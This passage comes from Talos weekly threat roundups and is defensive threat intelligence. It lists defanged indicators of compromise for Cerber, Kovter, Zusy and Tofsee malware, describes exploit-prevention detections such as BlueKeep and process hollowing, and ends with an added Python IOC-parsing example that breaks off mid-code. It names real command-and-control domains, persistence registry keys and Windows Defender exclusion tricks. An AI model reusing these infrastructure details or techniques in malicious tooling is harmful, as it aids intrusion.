1b3b09c6ff6a035dba76d90f401127e58cc897895c077a9c5842b7d1890720f8
1d5d51d82b63ac0ad56d91b39f7b4d271a2e4413e90d36fcf38804dddd321018
209d05880be9d0626504cc03ad8c05b5f967186dfbbd6f7f020b377dd692fbed
20d5c1348fcefe4920bb03dd859a1967116a7f09f21fa30ba46c47b94d0bc259
20ec024bae45dadd7f89e4c2ac2d883135593e0d9de294c7d2d0daaaf7c024e9
```

*See JSON for more IOCs

#### Coverage

Product | Protection (icons not reproduced)
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

AMP, ThreatGrid and Umbrella detection screenshots (images not reproduced).

* * *

### Win.Dropper.Cerber-7174760-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER` | 37
`<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER` Value Name: `PendingFileRenameOperations` | 37

Mutexes | Occurrences
---|---
`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 37
`shell.{<random GUID>}` | 22

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`94[.]22[.]172[.]0/27` | 37
`94[.]21[.]172[.]0/27` | 37
`94[.]23[.]172[.]0/25` | 37
`150[.]109[.]231[.]116` | 28
`3[.]225[.]205[.]112` | 19
`52[.]86[.]198[.]63` | 18
`178[.]128[.]255[.]179` | 9
`104[.]24[.]110[.]135` | 9
`104[.]24[.]111[.]135` | 8

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`api[.]blockcypher[.]com` | 37
`hjhqmbxyinislkkt[.]1j9r76[.]top` | 28
`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 22
`chain[.]so` | 9
`bitaps[.]com` | 9
`btc[.]blockr[.]io` | 9

Files and or directories created | Occurrences
---|---
`<dir>\_READ_THI$_FILE_<random, matching [A-F0-9]{4,8}>_.hta` | 37
`<dir>\_READ_THI$_FILE_<random, matching [A-F0-9]{4,8}>_.txt` | 37
`<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)` | 22

#### File Hashes

```
0290d4b80c48806f165fc69f0ad6f61ae4279a3c4aa85f24a23f6166e2056880
0675dd9ca7d0258f82f849b923c9f73574f7dc18660243964af3ca5ff5f83263
09558b11776fef2c9fe97ce334bcde4ab8bda7e6befc0becf0e06899742a102e
0e64387a13170fd75c61600e8420aaa93249265813cda9555c47b1d09c1f5cb9
115efdb3253671c21f525ef951c3427c210b0d762e81230e1071927a9081aa69
17fba2ecea6df6d1097de2bdedfce13dfc93884cf0725cdc0144bd61c9b3c49b
1e1a3c08ab28baa17331e96a2741f193120d81be3728975a8617322ab59cacea
21261d7e4e8df88ed2b02b84d6089cb5a3967b4d720ae1316f587fdfb0502754
2eb147f2c94c81e3e031a7aaa8f5f46e94d30a27f957b694bb43d9c7700a9a2c
2f94adf1f16c33bc8fd151ff86278a076bc9a817410ba8c4fe70e3a47594f934
398e36ca258b2004f6532081a5f4f7b8487af2f2fc47999469db795186fbfaaf
3c61509268caa1ddfc237409e46456ae862d1b8f058c178073139013ebff5cba
4148780b48335a6080b75d9d881f2c8c4e876ff2d5a0e8787c6fb7fbb5880114
42d25d3a5e18cdd4293b7cc17d3037695a47104ed6f874411fdf1be067e849a0
4580ecc3393d75b0ce69a8458afe9d19f460d2a618d2607e7a04e4bcc0810ad4
4623e856d3a24d187a33c89ca3f4d9a0333cbde4e051fc7c5d612cf01231ec05
52d7d75140381ab82780710ccb60fbde8251b7f31b85e533ecaff7dbec9b4ca8
592c9b4c77c295aa32bb9774b3b968f9dc9d55c17faaadd92b4629d6def1ad61
60c82c336eb368cc3a24c141513b4cf3789a7db7133967adb57ef81287305b3b
63ae7ce0bc9774b278fd6c349aea2af5b83e5779691fed96074b98ec44f059b7
6ee82f9a8090b3a074b19472f4ba79fff42495c261814e85db46582a3824f595
7e727b8dccd44f0cfc6b3771806243ae8d68a643dbdb4bdc9c2b54bccee7284d
8ed9c0eb8ab59f127ddfb578d2ff65030eb22fcf11f129f7ad0e2b551245d79a
99f5973656d5950ded3d862340ff5f25770c82a4b93827075b8d11b76f7aeb4c
a32ea31bc647853875b02c2ead84c6ad872ddc100185308d4978db841bd72f21
```

*See JSON for more IOCs

#### Coverage

Product | Protection (icons not reproduced)
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP and Malware detection screenshots (images not reproduced).

* * *

### Win.Dropper.Kovter-7173679-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE` Value Name: `DisableOSUpgrade` | 22
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE` Value Name: `ReservationsAllowed` | 22
`<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78` Value Name: `0521341d` | 22
`<HKCU>\SOFTWARE\FC6A75BE78` Value Name: `0521341d` | 22
`<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78` Value Name: `b5e001e3` | 22
`<HKCU>\SOFTWARE\FC6A75BE78` Value Name: `b5e001e3` | 22
`<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78` Value Name: `0905afc0` | 20
`<HKCU>\SOFTWARE\FC6A75BE78` Value Name: `0905afc0` | 20
`<HKLM>\SOFTWARE\WOW6432NODE\QYFTG2` Value Name: `3X3ii1` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\QYFTG2` Value Name: `bDH1PvniwF` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\721AB795C7C67F3DC` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\0MI0EBD` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\18F3F1A771B2D052` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\EGDJPDTYRP` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\721AB795C7C67F3DC` Value Name: `95635A6FA6E8366D` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\18F3F1A771B2D052` Value Name: `CF87DF8672E1A15F` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\0MI0EBD` Value Name: `u0Lsan` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\0MI0EBD` Value Name: `DS2VgqHGE` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\EGDJPDTYRP` Value Name: `jPILeBsM9v` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\EGDJPDTYRP` Value Name: `kGvXXUg` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\EA246A9E9F458BD5954` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\SVN2OQM` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\EA246A9E9F458BD5954` Value Name: `2CA8F0C3E2A3881649D` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\SVN2OQM` Value Name: `Ck6a8biOX` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\SVN2OQM` Value Name: `m7MJLVAz` | 1

Mutexes | Occurrences
---|---
`C59C87A31F74FB56` | 22
`Global\42EDC1955FE17AD4` | 22
`0D0D9BEBF5D08E7A` | 22
`1315B41013857E19` | 22
`BAD24FA07A7F6DD9` | 15
`863D9F083B3F4EDA` | 15
`Global\EE662FBC96CBCB1A` | 15

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`176[.]111[.]49[.]43` | 2
`46[.]4[.]52[.]109` | 2
`209[.]214[.]91[.]122` | 1
`76[.]229[.]109[.]110` | 1
`220[.]85[.]229[.]169` | 1
`80[.]88[.]109[.]65` | 1
`59[.]164[.]225[.]69` | 1
`15[.]155[.]62[.]37` | 1
`216[.]150[.]65[.]196` | 1
`121[.]230[.]123[.]110` | 1
`6[.]213[.]48[.]113` | 1
`99[.]248[.]253[.]80` | 1
`77[.]80[.]6[.]37` | 1
`19[.]43[.]124[.]213` | 1
`118[.]121[.]204[.]109` | 1
`36[.]244[.]111[.]17` | 1
`142[.]100[.]180[.]91` | 1
`15[.]198[.]236[.]200` | 1
`209[.]194[.]106[.]166` | 1
`153[.]235[.]117[.]235` | 1
`110[.]145[.]21[.]95` | 1
`7[.]83[.]197[.]163` | 1
`223[.]108[.]247[.]60` | 1
`222[.]180[.]100[.]74` | 1
`72[.]139[.]210[.]78` | 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`ottensen[.]de` | 1
`www[.]tastingtable[.]com` | 1

#### File Hashes

```
2c09d76519ef840e68d07428643a76b32cc15672ea227b1a373ac68d25364446
3d98668f8b44ff601400103fa4aabac3b9066892f0d32d6ad680ebfd6e22dc16
49cda94863ca85a318f0990f2d092a05746ef7d961a595ec268f0c9cc45968a2
6eccd1f893534539a478c8ec9e9eba5c57095dc3ebf53c3b0c74c47a6b306b51
71533197271e536d08e551a226133c4e2efb1262521498b5d021c3b7e5458062
734eab522ba7c0c5c3afeb61a6e8cae6c3b4c5375716aa15541e388fe2d03547
949a7cec76633cc63b11f3748d304b88fa89ef679927e2911b46639c91c0f9ce
9856c913730a44ee3d02ef3b36ed9c6da721a5ec55118c367ba69926753e6a42
9e7bc2705e9c9d0173e6fb49bd400dc8ccaca56e51557c31c17c814c8256f3e2
b00b3dd9bef667e32501e21a13a8af398d8d8a9778e95f1df2c21746a08ee102
b36e6ed7ff386b9f4d5e8c0284fe177d08eca668d46e70aa48340b883d696e27
bb3cd50224232eb7809baa208fd5b14f9e9d1aed691c383092f7245c89005241
beeeed6fc246f493b6be8f65c76cd328995147069d5091f4e2d01e927e631fe7
c245b59592220a1b4cd08432e842cc391845b471fc2eeb494aa0cb57453cf6e8
d3bdca637e70ed87cdc31d97c7e46320f20b73ed7c4af1fa25e11e9efab8e9f7
d4413827ff12f897303b585bf28ddf3edd7d836a92847671a178dfc8dc48cb7c
d5b5c2669ae45d436595ca86076208154f354de9a03135c23db20703ad034d08
d848892262acf288673c23c37be7f284b8b8747e8a424ed1ab342bfada5ff6b2
e4cd277d934fc543aea55870dd316bdf8b7437907a14332a441d6730ab4212e7
ede4f19e39c2e6c794c3ae97e5ba66b6eba29503ac8d71e9d84a10b697e8e5bb
f6d37485e3e3f9412bd6eeb3767a17949cfb87ccfec649f1a4590d8ac189ab50
fe5e1062716fe717363599ee27f85553a1598dd5e7b9b16f83de57e828a04e03
```

#### Coverage

Product | Protection (icons not reproduced)
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP and ThreatGrid detection screenshots (images not reproduced).

* * *

### Win.Malware.Zusy-7173469-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `EEFEB657` | 25

Mutexes | Occurrences
---|---
`EEFEB657` | 79
`4A60888F` | 13

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`216[.]218[.]185[.]162` | 13
`216[.]218[.]206[.]69` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`brureservtestot[.]cc` | 9

Files and or directories created | Occurrences
---|---
`%HOMEPATH%\AppData\LocalLow\EEFEB657` | 26
`%APPDATA%\EEFEB657` | 26
`%APPDATA%\EEFEB657\bin.exe` | 25
`%APPDATA%\4A60888F\bin.exe` | 13

#### File Hashes

```
00afaf857ac8a4185bf3c413a0e4ec739cee9a3add5587042176270e2ba45465
0a97cd074abef0a20d0abacc579a0cb8de4eacda90bff198c69c58635085000d
12688cb61170c54096bce727b51225e5ac0d7614389634dab3ffeb41c207eab9
12c1420737fc88fe942c45cfa08c071d1e71cc085d108a8822566ccb7b832384
13548f2c1a514d85d5b47f719dda62ddf24cb1c71283b048aa8171a218a03b26
17999d48dc7614dc4f5c9fb078575df2396a0ba5e255685185ed5d2e2eaf8c85
1ed34a43106c50971c74b903f431e6564356ca6d67aec1233e83a1294375331c
1eeb3abd65800306e131d3de28807d183b9b430d9383a210b783c17f2048c1ca
203bbe399a62a7c8d30cf540647495d8fa7de90d8cbb0d666a901444942e9d1d
24ec9675730ebbd18fb3ce3f206a9e655bb83cced94e9aa9413944d34d159be3
261eeef081001542bbb3a528323e03a2f451930e304283e12e6668a764a1cac2
275943755b7ac0ce098df1d040396388b28de93bd8afde32f09b70b85800de79
29a4810fe9a54f55f4ece5797c593c474f62abc0a6b5d3dc3b3a0b21199993e8
2f6fff7aedc91ca250f42ee261df91fd5dde94741c54e6bcec4177a83bd665d1
39c130462d81e7488499d5f82adbe21f6a6e4926c52302a3f8d5151712869e54
45c2a30595130a32670a68527863cda01572870ab58c49ea12fc26dfd7e1f835
4979596ca617c43eedb54615f3443252c34a94793c3b94d35c44fed705843626
4aa3743336f0260b0734175365b6d409170009e5c1f223cb18bcc53fd3ad9b46
5153276508219d637a03570d1a228dbb60846849cf5659fc189c4d23a6555aa3
5c2529c1e5e740724ff97ef607c65cd2eaa39a096c52947946815187bf406376
5f35edd69fac10f629c53ee3d067ee0cb811fa3bc089b3f6c3d5ea98240675f7
62a73bcebe68715f7c79346d5d43c1017efb469d906cb62cd95949f4fea00b09
684d0bba591a3d78b3720573fa348ce327ac3d9be0ae3e6c337a77dfb294861e
6a8b78f181b0391908613fc6bb362ef1a3d0500c2ee80204e8a8c9099ec56ab7
6b324fe79b3118bf435ff17c4192e606928deb54613c2601ec0c763955e64a1b
```

*See JSON for more IOCs

#### Coverage

Product | Protection (icons not reproduced)
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

AMP, ThreatGrid and Umbrella detection screenshots (images not reproduced).

* * *

### Win.Packed.Tofsee-7171939-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config3` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: Type` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: Start` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: ErrorControl` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: DisplayName` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: WOW64` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: ObjectName` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: Description` | 10
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config0` | 10
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config1` | 10
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config2` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: ImagePath` | 6
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\nguazhnc` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\tmagfnti` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\slzfemsh` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\qjxdckqf` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\gzntsagv` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\exlrqyet` | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`239[.]255[.]255[.]250` | 10
`69[.]55[.]5[.]250` | 10
`46[.]4[.]52[.]109` | 10
`176[.]111[.]49[.]43` | 10
`85[.]25[.]119[.]25` | 10
`144[.]76[.]199[.]2` | 10
`144[.]76[.]199[.]43` | 10
`43[.]231[.]4[.]7` | 10
`192[.]0[.]47[.]59` | 10
`173[.]194[.]207[.]26/31` | 10
`85[.]114[.]134[.]88` | 10
`172[.]217[.]197[.]26/31` | 9
`98[.]136[.]96[.]92/31` | 9
`172[.]217[.]5[.]228` | 8
`67[.]195[.]228[.]84` | 8
`67[.]195[.]204[.]72/30` | 8
`213[.]209[.]1[.]129` | 7
`216[.]146[.]35[.]35` | 7
`211[.]231[.]108[.]46` | 7
`104[.]47[.]53[.]36` | 7
`213[.]205[.]33[.]62/31` | 7
`188[.]125[.]72[.]73` | 7
`104[.]47[.]6[.]33` | 6
`23[.]160[.]0[.]108` | 6
`216[.]163[.]188[.]54` | 6

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 10
`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 10
`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 10
`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 10
`whois[.]iana[.]org` | 10
`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 10
`whois[.]arin[.]net` | 10
`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 10
`eur[.]olc[.]protection[.]outlook[.]com` | 10
`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 10
`aol[.]com` | 10
`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 10
`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 10
`honeypus[.]rusladies[.]cn` | 10
`marina99[.]ruladies[.]cn` | 10
`sexual-pattern3[.]com` | 10
`coolsex-finders5[.]com` | 10
`mta5[.]am0[.]yahoodns[.]net` | 9
`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 9
`etb-1[.]mail[.]tiscali[.]it` | 8
`tiscalinet[.]it` | 8
`smtp-in[.]libero[.]it` | 7
`libero[.]it` | 7
`tiscali[.]it` | 7
`hanmail[.]net` | 7

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%SystemRoot%\SysWOW64\config\systemprofile` | 10
`%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>` | 10
`%TEMP%\<random, matching '[a-z]{8}'>.exe` | 10
`%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)` | 8
`%TEMP%\hjekdqa.exe` | 2

#### File Hashes

`08d08aedaab20d189db5d91b829e46d6485c9a80b0de1865ae66a6636a8f10a4 1060301d58657b07ab260d50e92c44112125ca9b225b049dafd428e47ff8c864 4518935de0954262f693d572260e01c37c5b3805358b4d8034f58a47208c15c3 7939dc52cea024666043b03e3dd324c3d0f24adb4cc9f05c75d45443eca6ffe7 8d1595bd4b6e37b043fbceffce01667b5a711cad028499a69285ced37db4a909 924242b90be9bca981b3ed8b7a7dcac8d6e192077d6ab0ce70d64390af8263a4 a97806cc79281fd6a5eb1f45b50787e5677f7a49c5e009629c260e2d33bc4dbb b34fc64ebd852b6e63c7926dff44f6bfee7d5b99201ace20f20c478162437410 c515f1bc8e5a44616976ea05ba3061b81670f5b5a2763b7abb2e9d0abcb62642 e6b5db7be9886ce7547bc05f42d87003215824316ac7126f3722518e7a1f6cd1`

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
Wsa |

#### Screenshots of Detection

#### AMP

[Screenshot](<https://1.bp.blogspot.com/-an28xcNtsEg/XY4IBSmNHLI/AAAAAAAACtY/ESpk9zq87sYWHabOU9Rlzne6lp56axp8QCLcBGAsYHQ/s1600/e6b5db7be9886ce7547bc05f42d87003215824316ac7126f3722518e7a1f6cd1_amp.png>)

#### ThreatGrid

[Screenshot](<https://1.bp.blogspot.com/-9b5Xenq2fNE/XY4IGa_51wI/AAAAAAAACtg/ItWvf-ZhdGESTd1ujHA-r7zXMxTs3__eQCLcBGAsYHQ/s1600/e6b5db7be9886ce7547bc05f42d87003215824316ac7126f3722518e7a1f6cd1_tg.png>)

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits.
These exploits use techniques that bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, which also protect against zero-day vulnerabilities.

CVE-2019-0708 detected - (9723)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a use-after-free in the kernel-mode RDP driver that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Because it can be triggered before authentication and allows remote code execution, it is wormable: malware can use it to spread automatically without human interaction.

Excessively long PowerShell command detected - (6212)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

Kovter injection detected - (1773)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless: the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the use of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Madshi injection detected - (1501)
Madshi is a code-injection framework that uses process injection to start a new thread when other methods of starting a thread within a process fail. The framework is used by a number of security solutions, but malware can use the same technique.

Process hollowing detected - (755)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then creates a legitimate child process in a suspended state, unmaps the child's original image, writes the unpacked payload into the child's address space and resumes it, so the payload runs under the legitimate process name.

Trickbot malware detected - (636)
Trickbot is a banking Trojan that appeared in late 2016. Because of the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has evolved rapidly in the months since it appeared, but it still lacks some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering and email searching.

Gamarue malware detected - (190)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

Special Search Offer adware - (110)
Special Search Offer adware displays unwanted advertising in the form of pop-ups or by injecting into browsers and altering advertisements on web pages. Adware has also been known to download and install malware.

Installcore adware detected - (95)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unw anted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

Dealply adware detected - (84)
DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on web pages. Adware has also been known to download and install malware.

Source: Talos blog, "Threat Roundup for September 20 to September 27," published 2019-09-27 (CVE list: CVE-2019-0708; CVSS 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C). Original post: <http://feedproxy.google.com/~r/feedburner/Talos/~3/SPetxCMHc3E/threat-roundup-0920-0927.html>

* * *

## Threat Roundup for Oct. 18 to Oct. 25

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 18 and Oct. 25. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5db322f0ac4bd.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Dropper.Emotet-7355854-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Ursnif-7355802-1 | Malware | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Malware.Upatre-7355650-0 | Malware | Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware.
Win.Dropper.Kovter-7352197-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. It has been used in the past to spread ransomware and click-fraud malware.
Win.Malware.Trickbot-7352185-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts.
Win.Virus.Expiro-7350682-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Malware.Tofsee-7349716-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Malware.Nymaim-7348211-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Malware.Cerber-7343756-1 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, this is no longer the case.
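The introduction above spells out the conventions the IOC tables below follow: values are defanged with `[.]`, a registry row carries its value name on a wrapped "Value Name:" line, randomised names are written as `<random, matching '...'>` regex fragments, and a hit on one lone indicator (an SSDP multicast address, a whois server) is explicitly not evidence of compromise. The Python below is an added example, not Talos code: it parses tables in that layout, turns each row into a matcher (CIDR rows become networks, placeholders become anchored regexes), runs the matchers over host and network observations, and names a family only when its hits span more than one IOC category. The table excerpt, the observations and the `%TEMP%`/`%APPDATA%` expansions are constructed for the example.

```python
"""Parse a Talos roundup's defanged IOC tables, compile its "<random, matching ...>"
placeholders into regexes, and report a family only on hits in more than one category."""
import ipaddress
import re
from collections import defaultdict

# Constructed excerpt in the roundup's table layout (defanged "[.]", a registry
# row wrapped onto a "Value Name:" line as the blog prints it, regex placeholders).
SAMPLE_ROUNDUP = r"""
### Win.Malware.Tofsee-7349716-1
Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type` | 10
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`239[.]255[.]255[.]250` | 10
`173[.]194[.]207[.]26/31` | 10
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`whois[.]iana[.]org` | 10
Files and or directories created | Occurrences
---|---
`%TEMP%\<random, matching '[a-z]{8}'>.exe` | 10
### Win.Malware.Trickbot-7352185-1
Mutexes | Occurrences
---|---
`Global\316D1C7871E10` | 23
"""
CATEGORIES = {"Registry Keys": "registry", "Mutexes": "mutex", "IP Addresses": "ip",
              "Domain Names": "domain", "Files and or directories": "file"}
ROW = re.compile(r"`(.+?)`\s*\|\s*(\d+)")
PLACEHOLDER = re.compile(r"<random, matching '?([^'>]+)'?>|<[^>]+>")  # post's pattern | any other <...>
ENV = {"%TEMP%": r"C:\Users\alice\AppData\Local\Temp",      # assumed expansions for the
       "%APPDATA%": r"C:\Users\alice\AppData\Roaming"}      # investigated host; not from the post


def parse_roundup(text):
    """Return {family: [(category, indicator, occurrences), ...]}."""
    iocs, family, category, pending = defaultdict(list), None, None, ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("### "):
            family, category = line[4:], None
        elif line.endswith("| Occurrences"):
            head = line.split("|")[0]
            category = next((c for k, c in CATEGORIES.items() if head.startswith(k)), None)
        elif line.startswith("`") and "|" not in line:
            pending = line                      # cell wraps onto the next line
        elif (m := ROW.fullmatch((pending + " " + line).strip())) and family and category:
            # "KEY Value Name: V" becomes "KEY::V" so key and value match as one string
            indicator = re.sub(r"\s*Value Name:\s*", "::", m.group(1))
            iocs[family].append((category, indicator, int(m.group(2))))
            pending = ""
    return dict(iocs)


def to_regex(indicator):
    """Escape literal text, expand hive/env placeholders, splice in the
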